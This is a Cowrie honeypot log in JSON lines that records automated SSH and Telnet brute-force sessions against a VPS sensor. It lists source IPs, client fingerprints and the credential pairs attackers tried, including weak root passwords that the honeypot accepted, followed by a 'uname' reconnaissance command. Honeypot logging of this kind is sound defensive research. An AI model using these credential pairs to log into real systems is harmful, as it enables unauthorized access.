{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:35:14.542546Z","src_ip":"51.79.164.132","session":"f8362d2d8037"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":48252,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f3ccc88c230","protocol":"ssh","message":"New connection: 185.93.89.7:48252 (1.2.3.4:22) [session: 9f3ccc88c230]","sensor":"my-vps","timestamp":"2025-08-28T09:35:34.284998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:35:34.323482Z","src_ip":"185.93.89.7","session":"9f3ccc88c230"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:35:34.324182Z","src_ip":"185.93.89.7","session":"9f3ccc88c230"}
{"eventid":"cowrie.login.failed","username":"index","password":"asdasd","message":"login attempt [index/asdasd] failed","sensor":"my-vps","timestamp":"2025-08-28T09:35:34.488533Z","src_ip":"185.93.89.7","session":"9f3ccc88c230"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:35:35.576462Z","src_ip":"185.93.89.7","session":"9f3ccc88c230"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":53986,"dst_ip":"1.2.3.4","dst_port":22,"session":"662859a1833f","protocol":"ssh","message":"New connection: 51.79.164.132:53986 (1.2.3.4:22) [session: 662859a1833f]","sensor":"my-vps","timestamp":"2025-08-28T09:35:36.135881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:35:36.444436Z","src_ip":"51.79.164.132","session":"662859a1833f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:35:36.445118Z","src_ip":"51.79.164.132","session":"662859a1833f"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:35:40.022950Z","src_ip":"51.79.164.132","session":"662859a1833f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:35:40.960154Z","src_ip":"51.79.164.132","session":"662859a1833f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:35:40.960844Z","src_ip":"51.79.164.132","session":"662859a1833f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:35:41.734998Z","src_ip":"51.79.164.132","session":"662859a1833f"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:35:41.736255Z","src_ip":"51.79.164.132","session":"662859a1833f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57620,"dst_ip":"1.2.3.4","dst_port":23,"session":"20a361627d35","protocol":"telnet","message":"New connection: 212.227.125.160:57620 (1.2.3.4:23) [session: 20a361627d35]","sensor":"my-vps","timestamp":"2025-08-28T09:35:54.465933Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":35316,"dst_ip":"1.2.3.4","dst_port":22,"session":"fead46b3effb","protocol":"ssh","message":"New connection: 185.93.89.7:35316 (1.2.3.4:22) [session: fead46b3effb]","sensor":"my-vps","timestamp":"2025-08-28T09:35:59.425823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:35:59.428114Z","src_ip":"185.93.89.7","session":"fead46b3effb"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:35:59.443944Z","src_ip":"185.93.89.7","session":"fead46b3effb"}
{"eventid":"cowrie.login.failed","username":"index","password":"123654","message":"login attempt [index/123654] failed","sensor":"my-vps","timestamp":"2025-08-28T09:35:59.498311Z","src_ip":"185.93.89.7","session":"fead46b3effb"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:36:00.534035Z","src_ip":"185.93.89.7","session":"fead46b3effb"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":42084,"dst_ip":"1.2.3.4","dst_port":22,"session":"9282b55f7867","protocol":"ssh","message":"New connection: 51.79.164.132:42084 (1.2.3.4:22) [session: 9282b55f7867]","sensor":"my-vps","timestamp":"2025-08-28T09:36:02.812695Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:36:03.094101Z","src_ip":"51.79.164.132","session":"9282b55f7867"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:36:03.095576Z","src_ip":"51.79.164.132","session":"9282b55f7867"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:36:05.005939Z","src_ip":"51.79.164.132","session":"9282b55f7867"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:36:06.432935Z","src_ip":"51.79.164.132","session":"9282b55f7867"}
{"eventid":"cowrie.session.closed","duration":13.598854780197144,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:36:08.064715Z","src_ip":"212.227.125.160","session":"20a361627d35"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":33880,"dst_ip":"1.2.3.4","dst_port":22,"session":"5958e2cb9ff6","protocol":"ssh","message":"New connection: 185.93.89.7:33880 (1.2.3.4:22) [session: 5958e2cb9ff6]","sensor":"my-vps","timestamp":"2025-08-28T09:36:24.591501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:36:24.592495Z","src_ip":"185.93.89.7","session":"5958e2cb9ff6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:36:24.610810Z","src_ip":"185.93.89.7","session":"5958e2cb9ff6"}
{"eventid":"cowrie.login.failed","username":"index","password":"00000000","message":"login attempt [index/00000000] failed","sensor":"my-vps","timestamp":"2025-08-28T09:36:24.650104Z","src_ip":"185.93.89.7","session":"5958e2cb9ff6"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:36:25.697949Z","src_ip":"185.93.89.7","session":"5958e2cb9ff6"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":37358,"dst_ip":"1.2.3.4","dst_port":22,"session":"7abdc2984355","protocol":"ssh","message":"New connection: 51.79.164.132:37358 (1.2.3.4:22) [session: 7abdc2984355]","sensor":"my-vps","timestamp":"2025-08-28T09:36:29.008687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:36:29.174421Z","src_ip":"51.79.164.132","session":"7abdc2984355"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:36:29.708555Z","src_ip":"51.79.164.132","session":"7abdc2984355"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:36:31.199268Z","src_ip":"51.79.164.132","session":"7abdc2984355"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:36:32.631948Z","src_ip":"51.79.164.132","session":"7abdc2984355"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:36:32.632654Z","src_ip":"51.79.164.132","session":"7abdc2984355"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:36:32.814974Z","src_ip":"51.79.164.132","session":"7abdc2984355"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:36:32.816143Z","src_ip":"51.79.164.132","session":"7abdc2984355"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":45620,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3dbac9178f0","protocol":"ssh","message":"New connection: 185.93.89.7:45620 (1.2.3.4:22) [session: a3dbac9178f0]","sensor":"my-vps","timestamp":"2025-08-28T09:36:48.190090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:36:48.197664Z","src_ip":"185.93.89.7","session":"a3dbac9178f0"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:36:48.208415Z","src_ip":"185.93.89.7","session":"a3dbac9178f0"}
{"eventid":"cowrie.login.failed","username":"index","password":"test123","message":"login attempt [index/test123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:36:48.262595Z","src_ip":"185.93.89.7","session":"a3dbac9178f0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:36:49.282950Z","src_ip":"185.93.89.7","session":"a3dbac9178f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:36:53.735834Z","src_ip":"212.227.235.229","session":"484d10691096"}
{"eventid":"cowrie.session.closed","duration":180.221129655838,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:36:53.739771Z","src_ip":"212.227.235.229","session":"484d10691096"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":46962,"dst_ip":"1.2.3.4","dst_port":22,"session":"98da529e00bc","protocol":"ssh","message":"New connection: 51.79.164.132:46962 (1.2.3.4:22) [session: 98da529e00bc]","sensor":"my-vps","timestamp":"2025-08-28T09:36:54.592861Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43670,"dst_ip":"1.2.3.4","dst_port":23,"session":"41fcb9575f05","protocol":"telnet","message":"New connection: 212.227.125.160:43670 (1.2.3.4:23) [session: 41fcb9575f05]","sensor":"my-vps","timestamp":"2025-08-28T09:36:54.656437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:36:54.854591Z","src_ip":"51.79.164.132","session":"98da529e00bc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:36:54.855268Z","src_ip":"51.79.164.132","session":"98da529e00bc"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX","message":"login attempt [oracle/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T09:36:57.901018Z","src_ip":"51.79.164.132","session":"98da529e00bc"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:36:59.112378Z","src_ip":"51.79.164.132","session":"98da529e00bc"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":58162,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac2548d6bec1","protocol":"ssh","message":"New connection: 185.93.89.7:58162 (1.2.3.4:22) [session: ac2548d6bec1]","sensor":"my-vps","timestamp":"2025-08-28T09:37:19.949053Z"}
